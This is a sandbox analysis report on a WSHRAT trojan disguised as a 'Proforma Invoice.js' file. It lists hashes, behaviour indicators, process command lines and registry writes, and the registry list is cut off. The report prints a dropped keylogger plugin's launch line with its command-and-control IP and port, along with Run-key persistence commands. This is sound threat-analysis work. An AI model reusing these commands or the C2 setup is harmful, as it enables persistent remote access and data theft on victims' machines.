General Info

File name

Proforma Invoice.js

Full analysis
https://app.any.run/tasks/1dea8e86-f054-466c-9e52-49efefff2adb
Verdict
Malicious activity
Analysis date
11/8/2019, 18:08:34
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

evasion

trojan

stealer

wshrat

Indicators:

MIME:
text/plain
File info:
ASCII text, with very long lines
MD5

e11c4858c73a9f7fc1e62d56997c596b

SHA1

da96c83b3c5b749d8dff9c5bae4b41a62e757738

SHA256

22d987eb8983590955a24c3458dfd18f192bb1dbd91e82f99a5da47d7248c866

SSDEEP

3072:/NMxSBziU1HE3Jua5LKvD4Yp4m+XeutNeNs:lj1HECvsYmmmeE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
120 seconds
Additional time used
60 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.34.7)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
  • Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (German) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB4019990
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Application was dropped or rewritten from another process
  • kl-plugin.exe (PID: 2236)
Writes to a start menu file
  • wscript.exe (PID: 952)
  • WScript.exe (PID: 1856)
Connects to CnC server
  • wscript.exe (PID: 952)
Changes the autorun value in the registry
  • wscript.exe (PID: 952)
  • WScript.exe (PID: 1856)
WSHRAT was detected
  • wscript.exe (PID: 952)
Connects to unusual port
  • wscript.exe (PID: 952)
Creates files in the user directory
  • WScript.exe (PID: 1856)
  • wscript.exe (PID: 952)
Starts CMD.EXE for commands execution
  • wscript.exe (PID: 952)
Executable content was dropped or overwritten
  • wscript.exe (PID: 952)
Executes scripts
  • WScript.exe (PID: 1856)
Checks for external IP
  • wscript.exe (PID: 952)
Uses TASKKILL.EXE to kill process
  • cmd.exe (PID: 4028)
Application launched itself
  • WScript.exe (PID: 1856)

No info indicators.

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

Screenshots

Processes

Total processes
40
Monitored processes
5
Malicious processes
2
Suspicious processes
0

Behavior graph

+
start drop and start wscript.exe #WSHRAT wscript.exe cmd.exe no specs taskkill.exe no specs kl-plugin.exe
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
1856
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Proforma Invoice.js"
Path
C:\Windows\System32\WScript.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\jscript.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml3.dll
c:\program files\common files\system\ado\msado15.dll
c:\windows\system32\msdart.dll
c:\windows\system32\mlang.dll
c:\windows\system32\wbem\wbemdisp.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\psapi.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\sspicli.dll

PID
952
CMD
"C:\Windows\System32\wscript.exe" "C:\Users\admin\AppData\Roaming\Proforma Invoice.js"
Path
C:\Windows\System32\wscript.exe
Indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\jscript.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml3.dll
c:\program files\common files\system\ado\msado15.dll
c:\windows\system32\msdart.dll
c:\windows\system32\mlang.dll
c:\windows\system32\wbem\wbemdisp.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\wship6.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\users\admin\appdata\roaming\kl-plugin.exe

PID
4028
CMD
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM kl-plugin.exe
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
wscript.exe
User
admin
Integrity Level
MEDIUM
Exit code
128
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
1880
CMD
taskkill /F /IM kl-plugin.exe
Path
C:\Windows\system32\taskkill.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
128
Version:
Company
Microsoft Corporation
Description
Terminates Processes
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\taskkill.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\mpr.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\winsta.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
2236
CMD
"C:\Users\admin\AppData\Roaming\kl-plugin.exe" 79.134.225.103 7775 "WSHRAT|C4BA3647|USER-PC|admin|Microsoft Windows 7 Professional |plus|nan-av|false - 8/11/2019|JavaScript-v2.3|IT:Italy" 1
Path
C:\Users\admin\AppData\Roaming\kl-plugin.exe
Indicators
Parent process
wscript.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
WSHRat Plugin
Description
klplu
Version
1.1.0.0
Modules
Image
c:\users\admin\appdata\roaming\kl-plugin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\profapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\system32\cryptbase.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.drawing\dbfe8642a8ed7b2b103ad28e0c96418a\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.windows.forms\3afcd5168c7a6cb02eab99d7fd71e102\system.windows.forms.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.visualbas#\08d608378aa405adc844f3cf36974b8c\microsoft.visualbasic.ni.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll

Registry activity

Total events
593
Read events
542
Write events
51
Delete events
0

Modification events

PID
Process
Operation
Key
Name
Value
1856
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Proforma Invoice
false - 8/11/2019
1856
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Proforma Invoice
wscript.exe //B "C:\Users\admin\AppData\Roaming\Proforma Invoice.js"
1856
WScript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Proforma Invoice
wscript.exe //B "C:\Users\admin\AppData\Roaming\Proforma Invoice.js"
1856
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
1856
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
952
wscript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Proforma Invoice
wscript.exe //B "C:\Users\admin\AppData\Roaming\Proforma Invoice.js"
952
wscript.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Proforma Invoice
wscript.exe //B "C:\Users\admin\AppData\Roaming\Proforma Invoice.js"
952
